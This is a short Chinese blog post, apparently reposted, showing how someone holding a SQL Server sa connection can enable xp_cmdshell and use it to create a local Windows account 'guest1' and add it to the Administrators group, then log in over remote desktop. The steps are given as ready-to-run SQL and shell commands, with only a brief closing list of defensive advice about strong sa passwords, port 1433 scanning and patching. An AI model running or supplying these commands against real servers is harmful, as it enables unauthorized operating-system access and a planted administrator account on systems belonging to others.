根据数据库连接,登录操作系统的一个方法

如果你用sa帐号与数据库建立了连接,那么你便可以通过如下方法登录操作系统

1、开启xp_cmdshell配置权限

exec sp_configure  ' show advanced options ', 1
go
reconfigure
go
exec sp_configure  ' xp_cmdshell ', 1
go
reconfigure r

2、建立登录帐号

 

exec xp_cmdshell  ' net user guest1 guest1 /add '
exec xp_cmdshell  ' net localgroup administrators guest1 /add '
exec xp_cmdshell  ' net user '

 

 第一行是创建帐号,用户名密码是guest1,第二行将帐号添加到administrators组,第三行显示操作系统内帐号

3、远程桌面连接试试,看是否用上述帐号能够登上远程的操作系统

 以上代码仅做测试使用,如果未成功可能与本地设置有关。

 

总结:

1、sa帐号密码复杂度一定高,破解了sa密码,就相当于进入了操作系统,权限越大,造成的损失就可能越大。

2、数据库连接是可以做很多事情的,所以很多扫描工具,sql server的端口1433是重点扫描的对象 。

3、及时给系统升级,打补丁。不给不法分子以可乘之机,防患于未然。 

 

转载于:https://www.cnblogs.com/supperniu/archive/2011/12/26/2302394.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值